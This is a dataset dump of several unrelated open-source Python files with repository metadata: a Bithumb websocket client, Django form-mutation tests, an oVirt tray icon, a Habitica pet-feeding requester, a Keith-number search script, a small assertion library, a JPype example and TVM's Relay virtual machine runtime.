d555da4df0ff92fad94428138c04e5725366861c | 47542e6b98c19592f44ce44297771c698d4987f7 | /ch09/09_08.py | 42a496a958555522889a656ddd4e96b4f567131b | [
"Apache-2.0"
] | permissive | sharebook-kr/book-cryptocurrency | 235b6998668265ec804451afddd245a52824f51a | 847ba97ba096c257b35f5e507cd33fa6a0724860 | refs/heads/master | 2022-12-14T05:24:52.765589 | 2022-11-30T01:35:08 | 2022-11-30T01:35:08 | 128,632,349 | 162 | 141 | Apache-2.0 | 2022-11-30T01:35:09 | 2018-04-08T11:05:17 | Python | UTF-8 | Python | false | false | 301 | py | import websockets
import asyncio
async def bithumb_ws_client():
uri = "wss://pubwss.bithumb.com/pub/ws"
async with websockets.connect(uri) as websocket:
greeting = await websocket.recv()
print(greeting)
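# Note: this client only reads the initial connection greeting. To receive
# market data you would additionally send a subscription message here,
# e.g. (message format assumed from Bithumb's public WebSocket docs):
#     await websocket.send(
#         '{"type": "ticker", "symbols": ["BTC_KRW"], "tickTypes": ["24H"]}')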
async def main():
await bithumb_ws_client()
asyncio.run(main()) | [
"[email protected]"
] | |
9a4b55c49ddbd6bf15ee9f95c0e49e1c0aa461d2 | 0c7e54178e89a4dad98deb8265c2cb41ca3399b9 | /backend/strawberry_forms/tests/test_mutations.py | 470971ab95ea4f9bf7f8c47ae52ac75af4feafda | [
"MIT"
] | permissive | marlenebDC/pycon | 4394bf7a0aecc5aa8ae0b378900d86c2afc7fab7 | 175f2ee9e8698bbcf15dd33d2eb4739fee04c6d7 | refs/heads/master | 2023-07-07T00:34:39.932779 | 2020-01-21T01:00:24 | 2020-01-21T01:00:24 | 235,290,754 | 0 | 0 | MIT | 2023-06-23T23:35:11 | 2020-01-21T08:30:15 | null | UTF-8 | Python | false | false | 1,670 | py | import strawberry
from django.forms import Form, IntegerField
from strawberry_forms.mutations import FormMutation
def test_form_mutation_without_context():
class TestForm(Form):
a = IntegerField()
def save(self, *args, **kwargs):
return "hello"
class TestMutation(FormMutation):
class Meta:
form_class = TestForm
@strawberry.input
class TestInput:
a: int
assert TestMutation.Mutation(None, TestInput(a=1)) == "hello"
def test_form_mutation_response_can_be_converted_using_transform_method():
class TestForm(Form):
a = IntegerField()
def save(self, *args, **kwargs):
return "hello"
class TestMutation(FormMutation):
@classmethod
def transform(cls, result):
return "world"
class Meta:
form_class = TestForm
@strawberry.input
class TestInput:
a: int
assert TestMutation.Mutation(None, TestInput(a=1)) == "world"
def test_form_mutation_transform_is_not_required():
class TestForm(Form):
a = IntegerField()
def save(self, *args, **kwargs):
return "hello"
class TestMutation(FormMutation):
class Meta:
form_class = TestForm
@strawberry.input
class TestInput:
a: int
assert TestMutation.Mutation(None, TestInput(a=1)) == "hello"
def test_mutation_without_input():
class TestForm(Form):
def save(self, *args, **kwargs):
return "ciao"
class TestMutation(FormMutation):
class Meta:
form_class = TestForm
assert TestMutation.Mutation(None) == "ciao"
| [
"[email protected]"
] | |
225c14407e2eba431953f219ed8ecc4582a965c5 | 8b54570140861ffbe464e244f9f49ba55e341577 | /linux/ovirt-guest-tray.py | cdc740419735bb0eb6c99bfa8f3a70c09adf3c55 | [
"Apache-2.0"
] | permissive | vinzenz/ovirt-guest-agent-tray | 36569d149b7082e8129fbe5c462869bfeb8bf779 | 581a73f3ff4431a6a17f6ff9bc3d64f2b23ff586 | refs/heads/master | 2016-09-06T07:41:07.988384 | 2014-07-30T13:55:46 | 2014-07-30T13:57:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,422 | py | #!/usr/bin/env python
import gtk
class TrayIcon:
def __init__(self, *args, **kwargs):
self.icon = gtk.StatusIcon()
self.icon.set_from_file('ovirt-icon-48.svg')
self.icon.connect('popup-menu', self.on_popup_menu)
def on_about(self, *args, **kwargs):
dlg = gtk.Dialog("About the oVirt Guest Agent",
None,
gtk.DIALOG_MODAL | gtk.DIALOG_DESTROY_WITH_PARENT,
(gtk.STOCK_OK, gtk.RESPONSE_ACCEPT))
label1 = gtk.Label("oVirt Guest Agent for Linux")
label1.show()
label2 = gtk.Label("Version 3.6.0")
label2.show()
label3 = gtk.Label("oVirt Guest Agent is running.")
label3.show()
sw = gtk.ScrolledWindow()
sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)
sw.set_shadow_type(gtk.SHADOW_ETCHED_IN)
textview = gtk.TextView()
textview.set_editable(False)
textview.set_cursor_visible(False)
textview.set_sensitive(False)
sw.add(textview)
buffer = textview.get_buffer()
lic = '<Copyright information here>'
try:
f = open('/usr/share/ovirt-guest-agent/COPYING', 'r')
lic = f.read()
f.close()
except (OSError,IOError):
pass
buffer.insert(buffer.get_end_iter(), lic)
textview.show()
sw.show()
dlg.vbox.set_homogeneous(False)
dlg.vbox.pack_start(label1, fill=False, expand=False, padding=4)
dlg.vbox.pack_start(label2, fill=False, expand=False, padding=4)
dlg.vbox.pack_start(sw, fill=True, expand=True, padding=4)
dlg.vbox.pack_start(label3, fill=False, expand=False, padding=4)
dlg.set_default_size(640, 480)
dlg.run()
dlg.destroy()
def on_popup_menu(self, icon, event_button, event_time):
menu = gtk.Menu()
about = gtk.MenuItem('About')
about.show()
about.connect('activate', self.on_about)
menu.append(about)
sep = gtk.SeparatorMenuItem()
sep.show()
menu.append(sep)
quit = gtk.MenuItem('Quit')
quit.show()
menu.append(quit)
quit.connect('activate', gtk.main_quit)
menu.popup(None, None, gtk.status_icon_position_menu, event_button, event_time, self.icon)
if __name__ == '__main__':
icon = TrayIcon()
gtk.main()
| [
"[email protected]"
] | |
d5cab9a4b1e7e1be3cf13dddebae13f6a4066b74 | 1d9a6406c859fda186f520bb4472c551fc572c7b | /src/hopla/hoplalib/zoo/petcontroller.py | b5f9e7d0243348d6b233bab73bbf200a2f76e11e | [
"Apache-2.0"
] | permissive | rickie/hopla | af21b794ce6719d402721550e1ee4091790410b6 | 24a422194e42c03d5877dc167b2b07147326a595 | refs/heads/main | 2023-08-13T17:33:03.612293 | 2021-10-12T12:13:25 | 2021-10-12T12:13:25 | 408,538,704 | 0 | 0 | Apache-2.0 | 2021-09-20T17:30:15 | 2021-09-20T17:30:15 | null | UTF-8 | Python | false | false | 2,211 | py | """
A module for performing feeding Pet HTTP requests.
"""
from typing import NoReturn, Optional, Union
import requests
from hopla.hoplalib.http import HabiticaRequest, UrlBuilder
from hopla.hoplalib.zoo.feed_clickhelper import get_feed_data_or_exit
from hopla.hoplalib.zoo.zoofeed_algorithms import FeedPlanItem
class FeedPostRequester(HabiticaRequest):
"""
The FeedPostRequester sends a post request to feed a pet.
Note: this API endpoint expects query params instead
of a request body (even though it is a HTTP POST).
[APIDOCS](https://habitica.com/apidoc/#api-User-UserFeed)
"""
_DEFAULT_FOOD_AMOUNT = 1
def __init__(self, *,
pet_name: str,
food_name: str,
food_amount: Optional[int] = _DEFAULT_FOOD_AMOUNT):
self.pet_name = pet_name
self.food_name = food_name
self.query_params = {
"amount": food_amount or FeedPostRequester._DEFAULT_FOOD_AMOUNT
}
@property
def path(self) -> str:
"""Return the URL used to feed a pet"""
return f"/user/feed/{self.pet_name}/{self.food_name}"
@property
def feed_pet_food_url(self) -> str:
"""Return the url to feed a pet"""
return UrlBuilder(path_extension=self.path).url
def post_feed_request(self) -> requests.Response:
"""Performs the feed pet post requests and return the response"""
return requests.post(url=self.feed_pet_food_url, headers=self.default_headers,
params=self.query_params)
def post_feed_request_get_data_or_exit(self) -> Union[NoReturn, dict]:
"""
Performs the feed pet post requests and return
the feed response if successful. Else exit
:return:
"""
response: requests.Response = self.post_feed_request()
return get_feed_data_or_exit(response)
@classmethod
def build_from(cls, feed_item: FeedPlanItem) -> "FeedPostRequester":
"""Create a request from a feed plan item."""
return FeedPostRequester(
pet_name=feed_item.pet_name,
food_name=feed_item.food_name,
food_amount=feed_item.times
)
| [
"[email protected]"
] | |
e1461c6411425ee974d36267c209f92b7be55c59 | f6188c0c27da8d2507e832908ba9de524f0b907d | /client_speed_test.py | b23314ac7daa63ea09593b18003d1800d1583546 | [] | no_license | lforet/repfibdigit | df1df2fe2ba40ede9662120ea94f7d529f5d4abc | 945ce755fd2526a1a3e242b909b93a79ac4e65fb | refs/heads/master | 2021-01-10T08:43:11.123781 | 2018-12-21T05:32:45 | 2018-12-21T05:32:45 | 8,490,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,997 | py | #!/usr/bin/python # This is client.py file
#System modules
import os
import time
import itertools
import cPickle as pickle
import numpy as np
#import cProfile
import timeit
import uuid
import sys
import fib
########################################################################
pgbreak = "-----------------------------------------------"
#----------------------------------------------------------------------
def is_repfibdigit( number_to_test):
n = map(int,str(number_to_test))
while number_to_test > n[0]:
n=n[1:]+[sum(n)]
if (number_to_test == n[0]) & (number_to_test>9):
show_proof(number_to_test)
#raw_input()
#time.sleep(1)
#else:
# print number_to_test, " is NOT a Keith Number"
return
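# Worked example: 14 is a Keith number. Starting from its digits [1, 4],
# keep appending the window sum: [1, 4] -> [4, 5] -> [5, 9] -> [9, 14];
# the sequence reaches 14 itself, so the check above succeeds.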
def is_repfibdigit2( number_to_test):
if fib.is_repfibdigit(number_to_test) == True:
show_proof(number_to_test)
#raw_input()
#time.sleep(1)
#else:
# print number_to_test, " is NOT a Keith Number"
return
#this function is to get around the 32bit native int barrier
#not needed in 64 native systems
def my_xrange( start, stop, step):
i = start
while i < stop:
yield i
i += step
def show_proof(kn):
print '---------------------------------------------'
#print 'queue:', threading.current_thread()
print kn, " is a Keith Number!"
print "PROOF:"
n=map(int,str(kn))
while kn > sum(n):
print n ," = ", sum(n)
n=n[1:]+[sum(n)]
print n ," = ", sum(n)
#self.report_keith_num(number_to_test)
#print "new keith number reported!!!!"
print '---------------------------------------------'
print "press ENTER to continue"
########################################################################
if __name__=="__main__":
if len(sys.argv) > 1:
end_num = sys.argv[1]
else:
print "usage: %s <end_num>" % sys.argv[0]
sys.exit(1)
nowtime = time.clock()
# get num to work from
start_num = 0
print "Starting number:", start_num
for x in xrange(start_num, int(end_num)):
is_repfibdigit2(x)
print
print "completion time:", abs(nowtime - time.clock())
print pgbreak
#raw_input()
| [
"[email protected]"
] | |
00db2c8c3ed972b7163d98736f55e12ede747a2c | 50008b3b7fb7e14f793e92f5b27bf302112a3cb4 | /recipes/Python/577538_Poor_Man_unit_tests/recipe-577538.py | a085b12780b5428ff89dbdb43e8d9d754e602175 | [
"MIT"
] | permissive | betty29/code-1 | db56807e19ac9cfe711b41d475a322c168cfdca6 | d097ca0ad6a6aee2180d32dce6a3322621f655fd | refs/heads/master | 2023-03-14T08:15:47.492844 | 2021-02-24T15:39:59 | 2021-02-24T15:39:59 | 341,878,663 | 0 | 0 | MIT | 2021-02-24T15:40:00 | 2021-02-24T11:31:15 | Python | UTF-8 | Python | false | false | 3,834 | py | #! /usr/bin/env python
######################################################################
# Written by Kevin L. Sitze on 2010-12-03
# This code may be used pursuant to the MIT License.
######################################################################
import sys
import traceback
from types import FloatType, ComplexType
__all__ = (
'assertEquals',
'assertNotEquals',
'assertException',
'assertFalse',
'assertNone',
'assertNotNone',
'assertSame',
'assertNotSame',
'assertTrue'
)
def colon( msg ):
if msg:
return ": " + str( msg )
else:
return ""
def assertEquals( exp, got, msg = None ):
"""assertEquals( exp, got[, message] )
Two objects test as "equal" if:
* they are the same object as tested by the 'is' operator.
* either object is a float or complex number and the absolute
value of the difference between the two is less than 1e-8.
* applying the equals operator ('==') returns True.
"""
if exp is got:
r = True
elif ( type( exp ) in ( FloatType, ComplexType ) or
type( got ) in ( FloatType, ComplexType ) ):
r = abs( exp - got ) < 1e-8
else:
r = ( exp == got )
if not r:
print >>sys.stderr, "Error: expected <%s> but got <%s>%s" % ( repr( exp ), repr( got ), colon( msg ) )
traceback.print_stack()
def assertNotEquals( exp, got, msg = None ):
"""assertNotEquals( exp, got[, message] )
Two objects test as "equal" if:
* they are the same object as tested by the 'is' operator.
* either object is a float or complex number and the absolute
value of the difference between the two is less than 1e-8.
* applying the equals operator ('==') returns True.
"""
if exp is got:
r = False
elif ( type( exp ) in ( FloatType, ComplexType ) or
type( got ) in ( FloatType, ComplexType ) ):
r = abs( exp - got ) >= 1e-8
else:
r = ( exp != got )
if not r:
print >>sys.stderr, "Error: expected different values but both are equal to <%s>%s" % ( repr( exp ), colon( msg ) )
traceback.print_stack()
def assertException( exceptionType, f, msg = None ):
"""Assert that an exception of type \var{exceptionType}
is thrown when the function \var{f} is evaluated.
"""
try:
f()
except exceptionType:
assert True
else:
print >>sys.stderr, "Error: expected <%s> to be thrown by function%s" % ( exceptionType.__name__, colon( msg ) )
traceback.print_stack()
def assertFalse( b, msg = None ):
"""assertFalse( b[, message] )
"""
if b:
print >>sys.stderr, "Error: expected value to be False%s" % colon( msg )
traceback.print_stack()
def assertNone( x, msg = None ):
assertSame( None, x, msg )
def assertNotNone( x, msg = None ):
assertNotSame( None, x, msg )
def assertSame( exp, got, msg = None ):
if got is not exp:
print >>sys.stderr, "Error: expected <%s> to be the same object as <%s>%s" % ( repr( exp ), repr( got ), colon( msg ) )
traceback.print_stack()
def assertNotSame( exp, got, msg = None ):
if got is exp:
print >>sys.stderr, "Error: expected two distinct objects but both are the same object <%s>%s" % ( repr( exp ), colon( msg ) )
traceback.print_stack()
def assertTrue( b, msg = None ):
if not b:
print >>sys.stderr, "Error: expected value to be True%s" % colon( msg )
traceback.print_stack()
if __name__ == "__main__":
assertNone( None )
assertEquals( 5, 5 )
assertException( KeyError, lambda: {}['test'] )
assertNone( 5, 'this assertion is expected' )
assertEquals( 5, 6, 'this assertion is expected' )
assertException( KeyError, lambda: {}, 'this assertion is expected' )
| [
"[email protected]"
] | |
294780ff7ab60dc91677fc1d89295b77c146b850 | 4a53aba78d55247e185d8cef5e2a1f8892ae68be | /learn_python/08.jpype.py | 13917ac8e31a1518b4553ebf02a516bd1b6ee5af | [] | no_license | axu4github/Learn | 665bb8ddd2eb420a0e7bc3d1ff68f66958936645 | 2eb33b5a97f1730e3f774b80e3b206c49faa2228 | refs/heads/master | 2023-01-22T15:49:53.260777 | 2018-10-25T15:21:56 | 2018-10-25T15:21:56 | 61,703,577 | 1 | 0 | null | 2023-01-12T08:23:28 | 2016-06-22T08:46:46 | JavaScript | UTF-8 | Python | false | false | 664 | py | # encoding=utf-8
'''
Installing JPype on a Mac
1. Download the latest release from https://sourceforge.net/projects/jpype/
2. Unpack it and change into the extracted directory
3. Run `sudo python setup.py install`
If the build fails with "error: command 'clang' failed with exit status 1",
add "/System/Library/Frameworks/JavaVM.framework/Versions/A/Headers/" to
`self.includeDirs` in setup.py so that header files such as `jni.h` can be found.
See http://blog.csdn.net/jerrychenly/article/details/20545995 for details.
'''
from jpype import *
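# A more portable alternative (assumed to be supported by this JPype version)
# would be: startJVM(getDefaultJVMPath())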
startJVM('/Library/Java/JavaVirtualMachines/jdk1.7.0_09.jdk/Contents/MacOS/libjli.dylib')
java.lang.System.out.println("hello world")
shutdownJVM()
| [
"[email protected]"
] | |
8c817d375a6e4429ab2667c176887dbb4d65c7da | a499fbdd93f85a286505433a08afc25d84c8ff04 | /python/tvm/runtime/vm.py | 2be3f3ec1a78cdc5de989fd61d84de1855339132 | [
"Apache-2.0",
"Zlib",
"MIT",
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense"
] | permissive | elphinkuo/tvm | a81e0ccc5950a1473efdcdbb8263de9adbe36787 | 9df2ae8eaa8b394013182a7ad09ac57fe401f80e | refs/heads/main | 2023-08-05T07:41:18.652097 | 2021-09-28T00:38:26 | 2021-09-28T00:38:26 | 411,311,927 | 2 | 0 | Apache-2.0 | 2021-09-28T14:51:56 | 2021-09-28T14:17:46 | null | UTF-8 | Python | false | false | 21,091 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=no-else-return, unidiomatic-typecheck, undefined-variable, invalid-name, redefined-builtin
"""
The Relay Virtual Machine runtime.
Implements a Python interface to executing the compiled VM object.
"""
import numpy as np
import tvm
from tvm.runtime import Module
from tvm._ffi.runtime_ctypes import TVMByteArray
from tvm._ffi import base as _base
from .object import Object
from . import _ffi_api, container
from ..rpc.base import RPC_SESS_MASK
def _convert(arg, cargs):
if isinstance(arg, Object):
cargs.append(arg)
elif isinstance(arg, np.ndarray):
nd_arr = tvm.nd.array(arg, device=tvm.cpu(0))
cargs.append(nd_arr)
elif isinstance(arg, tvm.runtime.NDArray):
cargs.append(arg)
elif isinstance(arg, (tuple, list)):
field_args = []
for field in arg:
_convert(field, field_args)
cargs.append(container.tuple_object(field_args))
elif isinstance(arg, (_base.numeric_types, bool)):
dtype = "int32" if isinstance(arg, (_base.integer_types, bool)) else "float32"
value = tvm.nd.array(np.array(arg, dtype=dtype), device=tvm.cpu(0))
cargs.append(value)
elif isinstance(arg, str):
cargs.append(arg)
else:
raise TypeError("Unsupported type: %s" % (type(arg)))
def convert(args):
cargs = []
for arg in args:
_convert(arg, cargs)
return cargs
class Executable(object):
"""Relay VM executable"""
def __init__(self, mod):
self.mod = mod
self._function_params = {}
self._save = self.mod["save"]
self._get_lib = self.mod["get_lib"]
self._get_bytecode = self.mod["get_bytecode"]
self._get_stats = self.mod["get_stats"]
self._get_function_arity = self.mod["get_function_arity"]
self._get_function_param_name = self.mod["get_function_param_name"]
def save(self):
"""Save the Relay VM Executable.
Returns
-------
code : bytearray
The binary blob representing a serialized Relay VM executable. It
can then be saved to disk and later deserialized into a new
Executable.
lib : :py:class:`~tvm.runtime.Module`
The runtime module that contains the generated code. It is
basically a library that is composed of hardware dependent code.
Notes
-----
The returned code is organized with the following sections in order.
- Global section. This section contains the globals used by the
virtual machine.
- Constant section. This section is used to store the constant pool of
a virtual machine.
- Primitive name section. This section is introduced to accommodate
the list of primitive operator names that will be invoked by the
virtual machine.
- Code section. The VM functions, including bytecode, are sitting in
this section.
Examples
--------
.. code-block:: python
import numpy as np
import tvm
from tvm import te
from tvm import relay
# define a simple network.
x = relay.var('x', shape=(10, 10))
f = relay.Function([x], x + x)
mod = tvm.IRModule({"main": f})
# create a Relay VM.
dev = tvm.cpu()
target = "llvm"
executable = relay.vm.compile(mod, target)
code, lib = executable.save()
# save and load the code and lib file.
tmp = tvm.contrib.utils.tempdir()
path_lib = tmp.relpath("lib.so")
lib.export_library(path_lib)
with open(tmp.relpath("code.ro"), "wb") as fo:
fo.write(code)
loaded_lib = tvm.runtime.load_module(path_lib)
loaded_code = bytearray(open(tmp.relpath("code.ro"), "rb").read())
# deserialize.
des_exec = tvm.runtime.vm.Executable.load_exec(loaded_code, loaded_lib)
# execute the deserialized executable.
x_data = np.random.rand(10, 10).astype('float32')
des_vm = tvm.runtime.vm.VirtualMachine(des_exec, dev)
res = des_vm.run(x_data)
print(res.numpy())
"""
return self._save(), self._get_lib()
@staticmethod
def load_exec(bytecode, lib):
"""Construct an executable from saved artifacts.
Parameters
----------
bytecode : bytearray
The binary blob representing a the Relay VM bytecode.
lib : :py:class:`~tvm.runtime.Module`
The runtime module that contains the generated code.
Returns
-------
exec: Executable
An executable constructed using the provided artifacts.
"""
        if isinstance(bytecode, (bytes, str)):
            bytecode = bytearray(bytecode)
        elif not isinstance(bytecode, (bytearray, TVMByteArray)):
            raise TypeError(
                "bytecode is expected to be the type of bytearray "
                + "or TVMByteArray, but received {}".format(type(bytecode))
            )
if lib is not None and not isinstance(lib, tvm.runtime.Module):
raise TypeError(
"lib is expected to be the type of tvm.runtime.Module"
+ ", but received {}".format(type(lib))
)
return Executable(_ffi_api.Load_Executable(bytecode, lib))
@property
def lib(self):
"""Get the library that contains hardware dependent code.
Returns
-------
ret : :py:class:`~tvm.runtime.Module`
The runtime module that contains hardware dependent code.
"""
return self._get_lib()
@property
def stats(self):
"""Get the statistics of the Relay VM executable.
Returns
-------
ret : String
The statistic information of the VM executable.
"""
return self._get_stats()
@property
def primitive_ops(self):
"""Get the name of the primitive ops contained in the executable.
Returns
-------
ret : List[String]
The list of primitive ops.
"""
ret = []
num_primitives = _ffi_api.GetNumOfPrimitives(self.module)
for i in range(num_primitives):
ret.append(_ffi_api.GetPrimitiveFields(self.module, i))
return ret
@property
def bytecode(self):
"""Get the bytecode of the Relay VM executable.
Returns
-------
ret : String
The bytecode of the executable.
Notes
-----
The bytecode is in the following format:
func_name reg_file_size num_instructions
param1 param2 ... paramM
instruction1
instruction2
...
instructionN
Each instruction is printed in the following format:
hash opcode field1 ... fieldX # The text format.
The part starting from # is only used for visualization and debugging.
        The real serialized code doesn't contain it, therefore the deserializer
        doesn't need to deal with it either.
"""
return self._get_bytecode()
@property
def globals(self):
"""Get the globals used by the Relay VM executable.
Returns
-------
ret : List[String]
The globals contained in the executable.
"""
ret = []
num_globals = _ffi_api.GetNumOfGlobals(self.module)
for i in range(num_globals):
ret.append(_ffi_api.GetGlobalFields(self.module, i))
return ret
@property
def module(self):
"""Return the runtime module contained in a virtual machine executable."""
return self.mod
def get_function_params(self, func_name):
"""Get VM Function parameters"""
if func_name in self._function_params:
return self._function_params[func_name]
arity = self._get_function_arity(func_name)
assert arity >= 0
params = []
for i in range(arity):
p = self._get_function_param_name(func_name, i)
assert p
params.append(p)
self._function_params[func_name] = params
return params
class VirtualMachine(object):
"""Relay VM runtime.
Parameters
----------
exe : Executable
The VM executable.
device : tvm.runtime.Device or List[tvm.runtime.Device]
The device to deploy the module
memory_cfg : str or Dict[tvm.runtime.Device, str], optional
        Configures the type of memory allocator. The allocator type can be ["naive",
"pooled"]. If memory_cfg is None, all devices will use pooled allocator
by default. If memory_cfg is string, all devices will use the specified
allocator type. If memory_cfg is a dict, each device uses the allocator
type specified in the dict, or pooled allocator if not specified in the
dict.
"""
NAIVE_ALLOCATOR = 1
POOLED_ALLOCATOR = 2
def __init__(self, exe, device, memory_cfg=None):
"""
Construct a VirtualMachine wrapper class which provides a simple
interface over the raw C++ Module based API.
Parameters
----------
exe: Union[Executable, Module]
The executable either with the wrapper Python type or the raw runtime.Module.
In most cases this will be the Python wrapper class tvm.runtime.vm.Executable but
if you instead get the underlying runtime.Module subclass (i.e `exe.mod`) you
can directly pass it to this method.
This case can occur when doing things such as RPC where TVM's module APIs
return the raw modules, not the wrapped modules. This constructor will
handle this internally.
device: Union[Device, List[Device]]
The device, or devices on which to execute the VM code.
        memory_cfg: Optional[Union[str, Dict[tvm.runtime.Device, str]]]
The allocator behavior to use for the VM.
Returns
-------
vm: VirtualMachine
A VM wrapper object.
"""
if not isinstance(exe, Executable) and not isinstance(exe, Module):
raise TypeError(
"exe is expected to be the type of Executable, "
+ "but received {}".format(type(exe))
)
if not isinstance(exe, Executable):
exe = Executable(exe)
self.module = exe.mod["vm_load_executable"]()
self._exec = exe
self._init = self.module["init"]
self._invoke = self.module["invoke"]
self._invoke_stateful = self.module["invoke_stateful"]
self._get_output = self.module["get_output"]
self._get_num_outputs = self.module["get_num_outputs"]
self._get_input_index = self.module["get_input_index"]
self._set_input = self.module["set_input"]
self._setup_device(device, memory_cfg)
def _setup_device(self, dev, memory_cfg):
"""Init devices and allocators."""
devs = dev
if not isinstance(dev, (list, tuple)):
if not isinstance(dev, tvm.runtime.Device):
raise TypeError(
"dev is expected to be Device or \
List[Device]"
)
devs = [dev]
# CPU is required for executing shape functions
if not any(c.device_type % RPC_SESS_MASK == tvm.cpu().device_type for c in devs):
devs.append(tvm.cpu())
default_alloc_type = VirtualMachine.POOLED_ALLOCATOR
if memory_cfg is None:
memory_cfg = {}
elif isinstance(memory_cfg, str):
assert memory_cfg in ["naive", "pooled"]
if memory_cfg == "naive":
default_alloc_type = VirtualMachine.NAIVE_ALLOCATOR
memory_cfg = {}
elif not isinstance(memory_cfg, dict):
raise TypeError(
"memory_cfg is expected be string or dictionary, "
+ "but received {}".format(type(memory_cfg))
)
init_args = []
for device in devs:
init_args.append(device.device_type % RPC_SESS_MASK)
init_args.append(device.device_id)
alloc_type = memory_cfg[device] if device in memory_cfg else default_alloc_type
init_args.append(alloc_type)
self._init(*init_args)
def set_input(self, func_name, *args, **kwargs):
"""Set the input to a function.
Parameters
----------
func_name : str
The name of the function.
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
"""
if kwargs:
# kwargs is a super set of the required function parameters. We
# only find the ones that are needed.
func_params = self._exec.get_function_params(func_name)
new_args = [None] * len(func_params)
cnt = 0
for k in kwargs:
if k in func_params:
idx = func_params.index(k)
new_args[idx] = kwargs[k]
cnt += 1
assert len(args) + cnt == len(func_params)
idx = 0
for i, arg in enumerate(new_args):
if arg is None:
new_args[i] = args[idx]
idx += 1
args = new_args
cargs = convert(args)
self._set_input(func_name, *cargs)
def invoke(self, func_name, *args, **kwargs):
"""Invoke a function.
Parameters
----------
func_name : str
The name of the function.
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
Returns
-------
result : Object
The output.
"""
if args or kwargs:
self.set_input(func_name, *args, **kwargs)
return self._invoke(func_name)
def run(self, *args, **kwargs):
"""Run the main function.
Parameters
----------
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
Returns
-------
result : Object
The output.
"""
return self.invoke("main", *args, **kwargs)
def invoke_stateful(self, func_name, *args, **kwargs):
"""Invoke a function and ignore the returned result.
Use this function when running over rpc because it is currently
        impossible to return an ADT object over rpc. To get the outputs, use
        :py:func:`get_outputs`.
Parameters
----------
func_name : str
The name of the function.
args : list[tvm.runtime.NDArray] or list[np.ndarray]
The arguments to the function.
kwargs: dict of str to tvm.runtime.NDArray or np.ndarray
Named arguments to the function.
"""
if args or kwargs:
self.set_input(func_name, *args, **kwargs)
self._invoke_stateful(func_name)
def get_outputs(self):
"""Get the outputs from a call to :py:func`invoke_stateful`.
Returns
-------
outputs : List[NDArray]
"""
return [self._get_output(i) for i in range(self._get_num_outputs())]
def get_input_index(self, input_name, func_name="main"):
"""Get inputs index via input name.
Parameters
----------
        input_name : str
The input key name
func_name : str
The function name
Returns
-------
index: int
The input index. -1 will be returned if the given input name is not found.
"""
return self._get_input_index(input_name, func_name)
def benchmark(
self,
device,
*args,
func_name="main",
repeat=5,
number=5,
min_repeat_ms=None,
end_to_end=False,
**kwargs,
):
"""Calculate runtime of a function by repeatedly calling it.
Use this function to get an accurate measurement of the runtime of a function. The function
is run multiple times in order to account for variability in measurements, processor speed
or other external factors. Mean, median, standard deviation, min and max runtime are all
reported. On GPUs, CUDA and ROCm specifically, special on-device timers are used so that
        synchronization and data transfer operations are not counted towards the runtime. This allows
for fair comparison of runtimes across different functions and models. The `end_to_end` flag
switches this behavior to include data transfer operations in the runtime.
The benchmarking loop looks approximately like so:
.. code-block:: python
for r in range(repeat):
time_start = now()
for n in range(number):
func_name()
time_end = now()
total_times.append((time_end - time_start)/number)
Parameters
----------
func_name : str
The function to benchmark
repeat : int
Number of times to run the outer loop of the timing code (see above). The output will
contain `repeat` number of datapoints.
number : int
Number of times to run the inner loop of the timing code. This inner loop is run in
between the timer starting and stopping. In order to amortize any timing overhead,
            `number` should be increased when the runtime of the function is small (less than 1/10
of a millisecond).
min_repeat_ms : Optional[float]
If set, the inner loop will be run until it takes longer than `min_repeat_ms`
milliseconds. This can be used to ensure that the function is run enough to get an
accurate measurement.
end_to_end : bool
If set, include time to transfer input tensors to the device and time to transfer
returned tensors in the total runtime. This will give accurate timings for end to end
workloads.
args : Sequence[Object]
Arguments to the function. These are cached before running timing code, so that data
transfer costs are not counted in the runtime.
kwargs : Dict[str, Object]
Named arguments to the function. These are cached like `args`.
Returns
-------
timing_results : BenchmarkResult
Runtimes of the function. Use `.mean` to access the mean runtime, use `.results` to
access the individual runtimes (in seconds).
"""
min_repeat_ms = 0 if min_repeat_ms is None else min_repeat_ms
if end_to_end:
# We need to unpack keyword arguments into positional arguments
packed_args = list(args)
for k, v in kwargs.items():
i = self.get_input_index(k, func_name)
if i < 0:
raise TypeError(f"{func_name}() got an unexpected keyword argument '{k}'")
while i >= len(packed_args):
packed_args.append(None)
packed_args[i] = v
return self.module.time_evaluator(
"invoke_return_to_device",
device,
repeat=repeat,
number=number,
min_repeat_ms=min_repeat_ms,
)(func_name, device.device_type, device.device_id, *packed_args)
if args or kwargs:
self.set_input(func_name, *args, **kwargs)
return self.module.time_evaluator(
"invoke", device, repeat=repeat, number=number, min_repeat_ms=min_repeat_ms
)(func_name)
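
# A minimal end-to-end sketch of the wrappers above (assumptions: tvm.relay is
# importable here and an "x + x" Relay function is an acceptable demo; each
# call below mirrors the docstrings in this file):
if __name__ == "__main__":
    from tvm import relay

    x = relay.var("x", shape=(10, 10))
    mod = tvm.IRModule({"main": relay.Function([x], x + x)})
    exe = relay.vm.compile(mod, target="llvm")

    vm = VirtualMachine(exe, tvm.cpu(), memory_cfg="naive")
    data = np.random.rand(10, 10).astype("float32")
    print(vm.run(data).numpy())       # positional argument
    vm.set_input("main", x=data)      # keyword argument matched by name
    print(vm.invoke("main").numpy())
    print(vm.benchmark(tvm.cpu(), data, repeat=3, number=2))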
| [
"[email protected]"
] | |
